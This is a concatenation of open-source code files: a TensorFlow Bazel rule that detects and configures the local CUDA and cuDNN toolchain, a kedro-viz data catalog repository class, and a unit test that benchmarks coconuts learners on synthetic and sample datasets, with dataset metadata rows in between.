repository_ctx: The repository context.
cudnn_header_dir: The directory containing the cuDNN header.
define: The #define to search for.
Returns:
The value of the #define found in cudnn.h.
"""
# Confirm location of cudnn.h and grep for the line defining CUDNN_MAJOR.
cudnn_h_path = repository_ctx.path("%s/cudnn.h" % cudnn_header_dir)
if not cudnn_h_path.exists:
auto_configure_fail("Cannot find cudnn.h at %s" % str(cudnn_h_path))
result = repository_ctx.execute(["grep", "--color=never", "-E", define, str(cudnn_h_path)])
if result.stderr:
auto_configure_fail("Error reading %s: %s" %
(result.stderr, str(cudnn_h_path)))
# Parse the cuDNN major version from the line defining CUDNN_MAJOR
lines = result.stdout.splitlines()
if len(lines) == 0 or lines[0].find(define) == -1:
auto_configure_fail("Cannot find line containing '%s' in %s" %
(define, str(cudnn_h_path)))
return lines[0].replace(define, "").strip()
def _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value):
"""Detects the version of cuDNN installed on the system.
Args:
repository_ctx: The repository context.
cpu_value: The name of the host operating system.
cudnn_install_basedir: The cuDNN install directory.
Returns:
A string containing the version of cuDNN.
"""
cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
cudnn_install_basedir)
major_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_MAJOR)
minor_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_MINOR)
patch_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_PATCHLEVEL)
full_version = "%s.%s.%s" % (major_version, minor_version, patch_version)
# Check whether TF_CUDNN_VERSION was set by the user and fail if it does not
# match the detected version.
environ_version = ""
if _TF_CUDNN_VERSION in repository_ctx.os.environ:
environ_version = repository_ctx.os.environ[_TF_CUDNN_VERSION].strip()
if environ_version and not _matches_version(environ_version, full_version):
cudnn_h_path = repository_ctx.path("%s/include/cudnn.h" %
cudnn_install_basedir)
auto_configure_fail(
("cuDNN version detected from %s (%s) does not match " +
"TF_CUDNN_VERSION (%s)") %
(str(cudnn_h_path), full_version, environ_version))
# We only use the major version since we use the libcudnn libraries that are
# only versioned with the major version (e.g. libcudnn.so.5).
version = major_version
if cpu_value == "Windows":
version = "64_" + version
return version
def _compute_capabilities(repository_ctx):
"""Returns a list of strings representing cuda compute capabilities."""
if _TF_CUDA_COMPUTE_CAPABILITIES not in repository_ctx.os.environ:
return _DEFAULT_CUDA_COMPUTE_CAPABILITIES
capabilities_str = repository_ctx.os.environ[_TF_CUDA_COMPUTE_CAPABILITIES]
capabilities = capabilities_str.split(",")
for capability in capabilities:
# Workaround for Skylark's lack of support for regex. This check should
# be equivalent to checking:
# if re.match("[0-9]+.[0-9]+", capability) == None:
parts = capability.split(".")
if len(parts) != 2 or not parts[0].isdigit() or not parts[1].isdigit():
auto_configure_fail("Invalid compute capability: %s" % capability)
return capabilities
def _cpu_value(repository_ctx):
"""Returns the name of the host operating system.
Args:
repository_ctx: The repository context.
Returns:
A string containing the name of the host operating system.
"""
os_name = repository_ctx.os.name.lower()
if os_name.startswith("mac os"):
return "Darwin"
if os_name.find("windows") != -1:
return "Windows"
result = repository_ctx.execute(["uname", "-s"])
return result.stdout.strip()
def _is_windows(repository_ctx):
"""Returns true if the host operating system is windows."""
return _cpu_value(repository_ctx) == "Windows"
def _lib_name(lib, cpu_value, version="", static=False):
"""Constructs the platform-specific name of a library.
Args:
lib: The name of the library, such as "cudart"
cpu_value: The name of the host operating system.
version: The version of the library.
static: True the library is static or False if it is a shared object.
Returns:
The platform-specific name of the library.
"""
if cpu_value in ("Linux", "FreeBSD"):
if static:
return "lib%s.a" % lib
else:
if version:
version = ".%s" % version
return "lib%s.so%s" % (lib, version)
elif cpu_value == "Windows":
return "%s.lib" % lib
elif cpu_value == "Darwin":
if static:
return "lib%s.a" % lib
else:
if version:
version = ".%s" % version
return "lib%s%s.dylib" % (lib, version)
else:
auto_configure_fail("Invalid cpu_value: %s" % cpu_value)
def _find_cuda_lib(lib, repository_ctx, cpu_value, basedir, version="",
static=False):
"""Finds the given CUDA or cuDNN library on the system.
Args:
lib: The name of the library, such as "cudart"
repository_ctx: The repository context.
cpu_value: The name of the host operating system.
basedir: The install directory of CUDA or cuDNN.
version: The version of the library.
static: True if static library, False if shared object.
Returns:
Returns a struct with the following fields:
file_name: The basename of the library found on the system.
path: The full path to the library.
"""
file_name = _lib_name(lib, cpu_value, version, static)
if cpu_value == "Linux":
path = repository_ctx.path("%s/lib64/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/lib64/stubs/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/x86_64-linux-gnu/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
elif cpu_value == "Windows":
path = repository_ctx.path("%s/lib/x64/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/lib/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
auto_configure_fail("Cannot find cuda library %s" % file_name)
def _find_cupti_lib(repository_ctx, cuda_config):
"""Finds the cupti library on the system.
On most systems, the cupti library is not installed in the same directory as
the other CUDA libraries but rather in a special extras/CUPTI directory.
Args:
repository_ctx: The repository context.
cuda_config: The cuda configuration as returned by _get_cuda_config.
Returns:
Returns a struct with the following fields:
file_name: The basename of the library found on the system.
path: The full path to the library.
"""
file_name = _lib_name("cupti", cuda_config.cpu_value,
cuda_config.cuda_version)
if cuda_config.cpu_value == "Linux":
path = repository_ctx.path(
"%s/extras/CUPTI/lib64/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/x86_64-linux-gnu/%s" % (cuda_config.cuda_toolkit_path,
file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
elif cuda_config.cpu_value == "Windows":
path = repository_ctx.path(
"%s/extras/CUPTI/libx64/%s" %
(cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/extras/CUPTI/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
auto_configure_fail("Cannot find cupti library %s" % file_name)
def _find_libs(repository_ctx, cuda_config):
"""Returns the CUDA and cuDNN libraries on the system.
Args:
repository_ctx: The repository context.
cuda_config: The CUDA config as returned by _get_cuda_config
Returns:
Map of library names to structs of filename and path as returned by
_find_cuda_lib and _find_cupti_lib.
"""
cudnn_version = cuda_config.cudnn_version
cudnn_ext = ".%s" % cudnn_version if cudnn_version else ""
cpu_value = cuda_config.cpu_value
return {
"cuda": _find_cuda_lib("cuda", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path),
"cudart": _find_cuda_lib(
"cudart", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cudart_static": _find_cuda_lib(
"cudart_static", repository_ctx, cpu_value,
cuda_config.cuda_toolkit_path, cuda_config.cuda_version, static=True),
"cublas": _find_cuda_lib(
"cublas", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cusolver": _find_cuda_lib(
"cusolver", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"curand": _find_cuda_lib(
"curand", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cufft": _find_cuda_lib(
"cufft", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cudnn": _find_cuda_lib(
"cudnn", repository_ctx, cpu_value, cuda_config.cudnn_install_basedir,
cuda_config.cudnn_version),
"cupti": _find_cupti_lib(repository_ctx, cuda_config),
}
def _find_cudnn_header_dir(repository_ctx, cudnn_install_basedir):
"""Returns the path to the directory containing cudnn.h
Args:
repository_ctx: The repository context.
cudnn_install_basedir: The cudnn install directory as returned by
_cudnn_install_basedir.
Returns:
The path of the directory containing the cudnn header.
"""
if repository_ctx.path(cudnn_install_basedir + "/cudnn.h").exists:
return cudnn_install_basedir
if repository_ctx.path(cudnn_install_basedir + "/include/cudnn.h").exists:
return cudnn_install_basedir + "/include"
if repository_ctx.path("/usr/include/cudnn.h").exists:
return "/usr/include"
auto_configure_fail("Cannot find cudnn.h under %s" % cudnn_install_basedir)
def _find_cudnn_lib_path(repository_ctx, cudnn_install_basedir, symlink_files):
"""Returns the path to the directory containing libcudnn
Args:
repository_ctx: The repository context.
cudnn_install_basedir: The cudnn install dir as returned by
_cudnn_install_basedir.
symlink_files: The symlink files as returned by _cuda_symlink_files.
Returns:
The path of the directory containing the cudnn libraries.
"""
lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib
if repository_ctx.path(lib_dir).exists:
return lib_dir
alt_lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib_alt
if repository_ctx.path(alt_lib_dir).exists:
return alt_lib_dir
auto_configure_fail("Cannot find %s or %s under %s" %
(symlink_files.cuda_dnn_lib, symlink_files.cuda_dnn_lib_alt,
cudnn_install_basedir))
def _cudart_static_linkopt(cpu_value):
"""Returns additional platform-specific linkopts for cudart."""
return "" if cpu_value == "Darwin" else "\"-lrt\","
def _get_cuda_config(repository_ctx):
"""Detects and returns information about the CUDA installation on the system.
Args:
repository_ctx: The repository context.
Returns:
A struct containing the following fields:
cuda_toolkit_path: The CUDA toolkit installation directory.
cudnn_install_basedir: The cuDNN installation directory.
cuda_version: The version of CUDA on the system.
cudnn_version: The version of cuDNN on the system.
compute_capabilities: A list of the system's CUDA compute capabilities.
cpu_value: The name of the host operating system.
"""
cpu_value = _cpu_value(repository_ctx)
cuda_toolkit_path = _cuda_toolkit_path(repository_ctx)
cuda_version = _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value)
cudnn_install_basedir = _cudnn_install_basedir(repository_ctx)
cudnn_version = _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value)
return struct(
cuda_toolkit_path = cuda_toolkit_path,
cudnn_install_basedir = cudnn_install_basedir,
cuda_version = cuda_version,
cudnn_version = cudnn_version,
compute_capabilities = _compute_capabilities(repository_ctx),
cpu_value = cpu_value)
def _tpl(repository_ctx, tpl, substitutions={}, out=None):
if not out:
out = tpl.replace(":", "/")
repository_ctx.template(
out,
Label("//third_party/gpus/%s.tpl" % tpl),
substitutions)
def _file(repository_ctx, label):
repository_ctx.template(
label.replace(":", "/"),
Label("//third_party/gpus/%s.tpl" % label),
{})
_DUMMY_CROSSTOOL_BZL_FILE = """
def error_gpu_disabled():
fail("ERROR: Building with --config=cuda but TensorFlow is not configured " +
"to build with GPU support. Please re-run ./configure and enter 'Y' " +
"at the prompt to build with GPU support.")
native.genrule(
name = "error_gen_crosstool",
outs = ["CROSSTOOL"],
cmd = "echo 'Should not be run.' && exit 1",
)
native.filegroup(
name = "crosstool",
srcs = [":CROSSTOOL"],
output_licenses = ["unencumbered"],
)
"""
_DUMMY_CROSSTOOL_BUILD_FILE = """
load("//crosstool:error_gpu_disabled.bzl", "error_gpu_disabled")
error_gpu_disabled()
"""
def _create_dummy_repository(repository_ctx):
cpu_value = _cpu_value(repository_ctx)
# Set up BUILD file for cuda/.
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "False",
"%{cuda_extra_copts}": "[]"
})
_tpl(repository_ctx, "cuda:BUILD",
{
"%{cuda_driver_lib}": _lib_name("cuda", cpu_value),
"%{cudart_static_lib}": _lib_name("cudart_static", cpu_value,
static=True),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cpu_value),
"%{cudart_lib}": _lib_name("cudart", cpu_value),
"%{cublas_lib}": _lib_name("cublas", cpu_value),
"%{cusolver_lib}": _lib_name("cusolver", cpu_value),
"%{cudnn_lib}": _lib_name("cudnn", cpu_value),
"%{cufft_lib}": _lib_name("cufft", cpu_value),
"%{curand_lib}": _lib_name("curand", cpu_value),
"%{cupti_lib}": _lib_name("cupti", cpu_value),
"%{cuda_include_genrules}": '',
"%{cuda_headers}": '',
})
# Create dummy files for the CUDA toolkit since they are still required by
# tensorflow/core/platform/default/build_config:cuda.
repository_ctx.file("cuda/cuda/include/cuda.h", "")
repository_ctx.file("cuda/cuda/include/cublas.h", "")
repository_ctx.file("cuda/cuda/include/cudnn.h", "")
repository_ctx.file("cuda/cuda/extras/CUPTI/include/cupti.h", "")
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cuda", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cudart", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cudart_static", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cublas", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cusolver", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cudnn", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("curand", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cufft", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % _lib_name("cupti", cpu_value))
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(repository_ctx, "cuda:cuda_config.h",
{
"%{cuda_version}": _DEFAULT_CUDA_VERSION,
"%{cudnn_version}": _DEFAULT_CUDNN_VERSION,
"%{cuda_compute_capabilities}": ",".join([
"CudaVersion(\"%s\")" % c
for c in _DEFAULT_CUDA_COMPUTE_CAPABILITIES]),
"%{cuda_toolkit_path}": _DEFAULT_CUDA_TOOLKIT_PATH,
}, "cuda/cuda/cuda_config.h")
# If cuda_configure is not configured to build with GPU support, and the user
# attempts to build with --config=cuda, add a dummy build rule to intercept
# this and fail with an actionable error message.
repository_ctx.file("crosstool/error_gpu_disabled.bzl",
_DUMMY_CROSSTOOL_BZL_FILE)
repository_ctx.file("crosstool/BUILD", _DUMMY_CROSSTOOL_BUILD_FILE)
def _execute(repository_ctx, cmdline, error_msg=None, error_details=None,
empty_stdout_fine=False):
"""Executes an arbitrary shell command.
Args:
repository_ctx: the repository_ctx object
cmdline: list of strings, the command to execute
error_msg: string, a summary of the error if the command fails
error_details: string, details about the error or steps to fix it
empty_stdout_fine: bool, if True, an empty stdout result is fine, otherwise
it's an error
Return:
the result of repository_ctx.execute(cmdline)
"""
result = repository_ctx.execute(cmdline)
if result.stderr or not (empty_stdout_fine or result.stdout):
auto_configure_fail(
"\n".join([
error_msg.strip() if error_msg else "Repository command failed",
result.stderr.strip(),
error_details if error_details else ""]))
return result
def _norm_path(path):
"""Returns a path with '/' and remove the trailing slash."""
path = path.replace("\\", "/")
if path[-1] == "/":
path = path[:-1]
return path
def _symlink_genrule_for_dir(repository_ctx, src_dir, dest_dir, genrule_name,
src_files = [], dest_files = []):
"""Returns a genrule to symlink(or copy if on Windows) a set of files.
If src_dir is passed, files will be read from the given directory; otherwise
we assume files are in src_files and dest_files
"""
if src_dir != None:
src_dir = _norm_path(src_dir)
dest_dir = _norm_path(dest_dir)
files = _read_dir(repository_ctx, src_dir)
# Create a list with the src_dir stripped to use for outputs.
dest_files = files.replace(src_dir, '').splitlines()
src_files = files.splitlines()
command = []
if not _is_windows(repository_ctx):
# We clear folders that might have been generated previously to avoid
# undesired inclusions
command.append('if [ -d "$(@D)/extras" ]; then rm $(@D)/extras -drf; fi')
command.append('if [ -d "$(@D)/include" ]; then rm $(@D)/include -drf; fi')
command.append('if [ -d "$(@D)/lib" ]; then rm $(@D)/lib -drf; fi')
command.append('if [ -d "$(@D)/nvvm" ]; then rm $(@D)/nvvm -drf; fi')
outs = []
for i in range(len(dest_files)):
if dest_files[i] != "":
# If we have only one file to link we do not want to use the dest_dir, as
# $(@D) will include the full path to the file.
dest = '$(@D)/' + dest_dir + dest_files[i] if len(dest_files) != 1 else '$(@D)/' + dest_files[i]
# On Windows, symlink is not supported, so we just copy all the files.
cmd = 'cp -f' if _is_windows(repository_ctx) else 'ln -s'
command.append(cmd + ' "%s" "%s"' % (src_files[i] , dest))
outs.append(' "' + dest_dir + dest_files[i] + '",')
genrule = _genrule(src_dir, genrule_name, " && ".join(command),
"\n".join(outs))
return genrule
def _genrule(src_dir, genrule_name, command, outs):
"""Returns a string with a genrule.
Genrule executes the given command and produces the given outputs.
"""
return (
'genrule(\n' +
' name = "' +
genrule_name + '",\n' +
' outs = [\n' +
outs +
'\n ],\n' +
' cmd = """\n' +
command +
'\n """,\n' +
')\n'
)
def _read_dir(repository_ctx, src_dir):
"""Returns a string with all files in a directory.
Finds all files inside a directory, traversing subfolders and following
symlinks. The returned string contains the full path of all files
separated by line breaks.
"""
if _is_windows(repository_ctx):
src_dir = src_dir.replace("/", "\\")
find_result = _execute(
repository_ctx, ["cmd.exe", "/c", "dir", src_dir, "/b", "/s", "/a-d"],
empty_stdout_fine=True)
# src_files will be used in genrule.outs where the paths must
# use forward slashes.
result = find_result.stdout.replace("\\", "/")
else:
find_result = _execute(
repository_ctx, ["find", src_dir, "-follow", "-type", "f"],
empty_stdout_fine=True)
result = find_result.stdout
return result
def _use_cuda_clang(repository_ctx):
if "TF_CUDA_CLANG" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_CUDA_CLANG"].strip()
return enable_cuda == "1"
return False
def _compute_cuda_extra_copts(repository_ctx, compute_capabilities):
if _use_cuda_clang(repository_ctx):
capability_flags = ["--cuda-gpu-arch=sm_" +
cap.replace(".", "") for cap in compute_capabilities]
else:
# Capabilities are handled in the "crosstool_wrapper_driver_is_not_gcc" for nvcc
capability_flags = []
return str(capability_flags)
def _create_local_cuda_repository(repository_ctx):
"""Creates the repository containing files set up to build with CUDA."""
cuda_config = _get_cuda_config(repository_ctx)
cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
cuda_config.cudnn_install_basedir)
# Set up symbolic links for the cuda toolkit by creating genrules to do
# symlinking. We create one genrule for each directory we want to track under
# cuda_toolkit_path
cuda_toolkit_path = cuda_config.cuda_toolkit_path
cuda_include_path = cuda_toolkit_path + "/include"
genrules = [_symlink_genrule_for_dir(repository_ctx,
cuda_include_path, "cuda/include", "cuda-include")]
genrules.append(_symlink_genrule_for_dir(repository_ctx,
cuda_toolkit_path + "/nvvm", "cuda/nvvm", "cuda-nvvm"))
genrules.append(_symlink_genrule_for_dir(repository_ctx,
cuda_toolkit_path + "/extras/CUPTI/include",
"cuda/extras/CUPTI/include", "cuda-extras"))
cuda_libs = _find_libs(repository_ctx, cuda_config)
cuda_lib_src = []
cuda_lib_dest = []
for lib in cuda_libs.values():
cuda_lib_src.append(lib.path)
cuda_lib_dest.append("cuda/lib/" + lib.file_name)
genrules.append(_symlink_genrule_for_dir(repository_ctx, None, "", "cuda-lib",
cuda_lib_src, cuda_lib_dest))
# Set up the symbolic links for cudnn if cudnn was was not installed to
# CUDA_TOOLKIT_PATH.
included_files = _read_dir(repository_ctx, cuda_include_path).replace(
cuda_include_path, '').splitlines()
if '/cudnn.h' not in included_files:
genrules.append(_symlink_genrule_for_dir(repository_ctx, None,
"cuda/include/", "cudnn-include", [cudnn_header_dir + "/cudnn.h"],
["cudnn.h"]))
else:
genrules.append(
'filegroup(\n' +
' name = "cudnn-include",\n' +
' srcs = [],\n' +
')\n'
)
# Set up BUILD file for cuda/
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx, cuda_config.compute_capabilities),
})
_tpl(repository_ctx, "cuda:BUILD",
{
"%{cuda_driver_lib}": cuda_libs["cuda"].file_name,
"%{cudart_static_lib}": cuda_libs["cudart_static"].file_name,
"%{cudart_static_linkopt}": _cudart_static_linkopt(
cuda_config.cpu_value),
"%{cudart_lib}": cuda_libs["cudart"].file_name,
"%{cublas_lib}": cuda_libs["cublas"].file_name,
"%{cusolver_lib}": cuda_libs["cusolver"].file_name,
"%{cudnn_lib}": cuda_libs["cudnn"].file_name,
"%{cufft_lib}": cuda_libs["cufft"].file_name,
"%{curand_lib}": cuda_libs["curand"].file_name,
"%{cupti_lib}": cuda_libs["cupti"].file_name,
"%{cuda_include_genrules}": "\n".join(genrules),
"%{cuda_headers}": ('":cuda-include",\n' +
' ":cudnn-include",')
})
# Set up crosstool/
cc = find_cc(repository_ctx)
host_compiler_includes = _host_compiler_includes(repository_ctx, cc)
cuda_defines = {
"%{cuda_include_path}": _cuda_include_path(repository_ctx,
cuda_config),
"%{host_compiler_includes}": host_compiler_includes,
}
if _use_cuda_clang(repository_ctx):
cuda_defines["%{clang_path}"] = cc
_tpl(repository_ctx, "crosstool:BUILD", {"%{linker_files}": ":empty"})
_tpl(repository_ctx, "crosstool:CROSSTOOL_clang", cuda_defines, out="crosstool/CROSSTOOL")
else:
nvcc_path = str(repository_ctx.path("%s/bin/nvcc%s" %
(cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else "")))
_tpl(repository_ctx, "crosstool:BUILD",
{"%{linker_files}": ":crosstool_wrapper_driver_is_not_gcc"})
_tpl(repository_ctx, "crosstool:CROSSTOOL_nvcc", cuda_defines, out="crosstool/CROSSTOOL")
_tpl(repository_ctx,
"crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc",
{
"%{cpu_compiler}": str(cc),
"%{cuda_version}": cuda_config.cuda_version,
"%{nvcc_path}": nvcc_path,
"%{gcc_host_compiler_path}": str(cc),
"%{cuda_compute_capabilities}": ", ".join(
["\"%s\"" % c for c in cuda_config.compute_capabilities]),
})
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(repository_ctx, "cuda:cuda_config.h",
{
"%{cuda_version}": cuda_config.cuda_version,
"%{cudnn_version}": cuda_config.cudnn_version,
"%{cuda_compute_capabilities}": ",".join(
["CudaVersion(\"%s\")" % c
for c in cuda_config.compute_capabilities]),
"%{cuda_toolkit_path}": cuda_config.cuda_toolkit_path,
}, "cuda/cuda/cuda_config.h")
def _create_remote_cuda_repository(repository_ctx, remote_config_repo):
"""Creates pointers to a remotely configured repo set up to build with CUDA."""
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx, _compute_capabilities(repository_ctx)),
})
_tpl(repository_ctx, "cuda:remote.BUILD",
{
"%{remote_cuda_repo}": remote_config_repo,
}, "cuda/BUILD")
_tpl(repository_ctx, "crosstool:remote.BUILD", {
"%{remote_cuda_repo}": remote_config_repo,
}, "crosstool/BUILD")
def _cuda_autoconf_impl(repository_ctx):
"""Implementation of the cuda_autoconf repository rule."""
if not _enable_cuda(repository_ctx):
_create_dummy_repository(repository_ctx)
else:
if _TF_CUDA_CONFIG_REPO in repository_ctx.os.environ:
_create_remote_cuda_repository(repository_ctx,
repository_ctx.os.environ[_TF_CUDA_CONFIG_REPO])
else:
_create_local_cuda_repository(repository_ctx)
cuda_configure = repository_rule(
implementation = _cuda_autoconf_impl,
environ = [
_GCC_HOST_COMPILER_PATH,
"TF_NEED_CUDA",
_CUDA_TOOLKIT_PATH,
_CUDNN_INSTALL_PATH,
_TF_CUDA_VERSION,
_TF_CUDNN_VERSION,
_TF_CUDA_COMPUTE_CAPABILITIES,
_TF_CUDA_CONFIG_REPO,
],
)
"""Detects and configures the local CUDA toolchain.
Add the following to your WORKSPACE FILE:
```python
cuda_configure(name = "local_config_cuda")
```
Args:
name: A unique name for this workspace rule.
"""
| 38.503274
| 102
| 0.684451
|
4a0f485d2544a0aec8d690e7248a3b5b0548047b
| 2,411
|
py
|
Python
|
package/kedro_viz/data_access/repositories/catalog.py
|
deepyaman/kedro-viz
|
3aef612b6dd405baac0bde68ef37c1f39eb6fa34
|
[
"BSD-3-Clause-Clear",
"Apache-2.0"
] | null | null | null |
package/kedro_viz/data_access/repositories/catalog.py
|
deepyaman/kedro-viz
|
3aef612b6dd405baac0bde68ef37c1f39eb6fa34
|
[
"BSD-3-Clause-Clear",
"Apache-2.0"
] | null | null | null |
package/kedro_viz/data_access/repositories/catalog.py
|
deepyaman/kedro-viz
|
3aef612b6dd405baac0bde68ef37c1f39eb6fa34
|
[
"BSD-3-Clause-Clear",
"Apache-2.0"
] | null | null | null |
"""`kedro_viz.data_access.repositories.catalog` defines interface to
centralise access to Kedro data catalog."""
# pylint: disable=missing-class-docstring,missing-function-docstring,protected-access
from typing import Optional
from kedro.io import AbstractDataSet, DataCatalog, DataSetNotFoundError
from kedro_viz.constants import KEDRO_VERSION
class CatalogRepository:
_catalog: DataCatalog
def __init__(self):
self._layers_mapping = None
def get_catalog(self) -> DataCatalog:
return self._catalog
def set_catalog(self, value: DataCatalog):
self._catalog = value
@staticmethod
def strip_encoding(dataset_name: str) -> str:
return dataset_name.split("@")[0]
@property
def layers_mapping(self):
"""Return layer mapping: dataset_full_name -> layer it belongs to in the catalog"""
if self._layers_mapping is not None:
return self._layers_mapping
if self._catalog.layers is None:
self._layers_mapping = {
self.strip_encoding(dataset_name): None
for dataset_name in self._catalog._data_sets
}
else:
self._layers_mapping = {}
for layer, dataset_names in self._catalog.layers.items():
self._layers_mapping.update(
{
self.strip_encoding(dataset_name): layer
for dataset_name in dataset_names
}
)
return self._layers_mapping
def get_dataset(self, dataset_name: str) -> Optional[AbstractDataSet]:
dataset_obj: Optional[AbstractDataSet]
if KEDRO_VERSION.match(">=0.16.0"):
try:
dataset_obj = self._catalog._get_dataset(dataset_name)
except DataSetNotFoundError: # pragma: no cover
dataset_obj = None
else:
dataset_obj = self._catalog._data_sets.get(dataset_name) # pragma: no cover
return dataset_obj
def get_layer_for_dataset(self, dataset_name: str) -> Optional[str]:
return self.layers_mapping.get(self.strip_encoding(dataset_name))
@staticmethod
def is_dataset_param(dataset_name: str) -> bool:
"""Return whether a dataset is a parameter"""
return (
dataset_name.lower().startswith("params:") or dataset_name == "parameters"
)
| 34.942029
| 91
| 0.641228
|
4a0f4a43e98a7b731ead7e1fceb0bd7f6a42564c
| 3,021
|
py
|
Python
|
tests/test_learners_bruteforce.py
|
owahltinez/coconuts
|
20aa29580c0114e88da70ba1e806becd2243e57b
|
[
"MIT"
] | 1
|
2021-09-10T01:56:01.000Z
|
2021-09-10T01:56:01.000Z
|
tests/test_learners_bruteforce.py
|
owahltinez/coconuts
|
20aa29580c0114e88da70ba1e806becd2243e57b
|
[
"MIT"
] | null | null | null |
tests/test_learners_bruteforce.py
|
owahltinez/coconuts
|
20aa29580c0114e88da70ba1e806becd2243e57b
|
[
"MIT"
] | null | null | null |
""" Test Convolution Module """
import sys
import cProfile
import warnings
from pstats import Stats
from unittest import TestCase, main
from bananas.sampledata.local import load_boston, load_titanic
from bananas.sampledata.synthetic import new_labels, new_line, new_3x3, new_poly, new_trig
from bananas.hyperparameters.bruteforce import BruteForce
from coconuts.learners.convolution import CNNClassifier, CNNRegressor
from coconuts.learners.linear import LogisticRegression, LinearRegressor
from coconuts.learners.multilayer import MLPClassifier, MLPRegressor
# Show traceback for all warnings
from bananas.utils.misc import warn_with_traceback
warnings.showwarning = warn_with_traceback
# pylint: disable=missing-docstring
class TestUtils(TestCase):
@classmethod
def setUpClass(cls):
cls.profiler = cProfile.Profile()
cls.profiler.enable()
@classmethod
def tearDownClass(cls):
stats = Stats(cls.profiler)
stats.strip_dirs()
stats.sort_stats("cumtime")
stats.print_stats(20)
def test_learner_synthetic(self):
opts = dict(random_seed=0)
learners_classifiers = [LogisticRegression, MLPClassifier, CNNClassifier]
learners_regressors = [LinearRegressor, MLPRegressor, CNNRegressor]
test_data = [
(learners_regressors, new_line(**opts), 0.95), # Approximate a line
(learners_regressors, new_trig(**opts), .75), # Approximate a sine curve
(learners_regressors, new_poly(**opts), 0.85), # Approximate a 4th deg. poly
(learners_classifiers, new_labels(**opts), 0.80), # Correctly guess labels
(learners_regressors, new_3x3(**opts), 0.90), # 3x3 fuzzy matrix
]
for learners, dataset, target_score in test_data:
pipeline = BruteForce(dataset, learners, n_jobs=4)
history = pipeline.train(dataset.input_fn, max_score=target_score, progress=True)
self.assertGreaterEqual(max(history.scores), target_score, dataset.name)
def test_learner_datasets(self):
opts = dict(random_seed=0)
learners_classifiers = [LogisticRegression, MLPClassifier, CNNClassifier]
learners_regressors = [LinearRegressor, MLPRegressor, CNNRegressor]
test_data = [
(learners_regressors, load_boston(**opts), 0.85), # Boston housing dataset
(learners_classifiers, load_titanic(**opts), 0.75), # Titanic dataset
]
for learners, train_test_datasets, target_score in test_data:
dataset, test_ds = train_test_datasets
pipeline = BruteForce(dataset, learners, n_jobs=4)
history = pipeline.train(dataset.input_fn, max_score=target_score, progress=True)
test_score = pipeline.score(*test_ds[:])
self.assertGreaterEqual(max(history.scores), target_score, dataset.name)
print("%s\t%.3f\t%.3f" % (dataset.name, max(history.scores), test_score))
if __name__ == "__main__":
sys.exit(main())
| 41.383562
| 93
| 0.703078
|
4a0f4a52fe3460cbbb04e9ddce257bbf689aaeab
| 910
|
py
|
Python
|
tackle/providers/system/hooks/strings.py
|
geometry-labs/tackle-box
|
83424a10416955ba983f0c14ec89bd79673a4282
|
[
"BSD-3-Clause"
] | 1
|
2021-04-13T23:10:11.000Z
|
2021-04-13T23:10:11.000Z
|
tackle/providers/system/hooks/strings.py
|
